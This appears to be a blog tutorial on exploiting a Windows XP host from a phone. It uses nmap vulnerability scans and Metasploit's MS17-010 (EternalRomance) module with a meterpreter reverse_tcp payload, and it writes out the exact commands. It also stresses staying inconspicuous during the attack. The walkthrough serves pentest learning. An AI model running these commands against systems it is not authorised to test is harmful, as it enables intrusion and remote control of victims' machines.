See If You Can Find It

Monday, June 15, 2020

Exploit from your phone!

Hey everyone! Hopefully you've been able to avoid the stereotypical dredge of Monday. If not, maybe you'll enjoy what I have for you today!

For all of you penetration tester's out there (or those aspiring to be one), most of the time you want to be as discreet as possible, right? Unless you're performing your engagement in a coffee shop or somewhere else where having your laptop out is the norm, you usually have to wait until after hours to do a lot of the technical work (or have a pretty powerful antenna to connect to their wireless environment). Well today, we're gonna talk about a way you can look like everyone else while engaging your environment. For this attack, we're using an old Windows XP machine (you'd be surprised at how many people still use it, Vladimir Putin does) and a Samsung Galaxy S9. The tools used are: Fing, Termux, Nmap, and Metasploit.



RECON

First, we need to do a scan of the network to find the host IP that we're going to be attacking. For this we're using Fing (check out my previous post HERE if you want to know how to use Fing).

VULNERABILITY IDENTIFICATION

We see there is a host named WinXP at IP 192.168.1.143. Now that we've identified this information, we should scan it with Nmap to see what services are running, and if there are any easy to find vulnerabilities in this system. We're going to do this simple scan by opening up Termux and typing in "nmap -vv -Pn --script vuln 192.168.1.143".
Here we see that this host is vulnerable to CVE-2017-0143  (Eternal Romance).

EXPLOITATION

Now we're going to launch Metasploit using "msfconsole" so that we can get our exploit going.

From here we need to load our exploit, set a payload to use, and specify the IP addresses of the attacking device as well as the victim. Here's the info that I've input here:
"use exploit/windows/smb/ms17_010_psexec"

"set payload windows/meterpreter/reverse_tcp"

"set lhost 192.168.1.137"

"set rhost 192.168.1.143"

Now that this is done, we're ready to exploit!

Success! Now we'll use a couple of commands to verify info about the machine we're on.

There we have it! Just like you were right at your computer, but for all anyone around would know, you're just scrolling through social media on your phone. Now, you may notice that my keyboard is different than the standard Samsung keyboard, that's because for a while now there has been a bug in the Samsung keyboard that causes letters typed to not show up in certain fields (Termux and Spotify are the two biggest problems with this). Here I'm using "Hacker's Keyboard" from the NetHunter Store.

No comments:

Post a Comment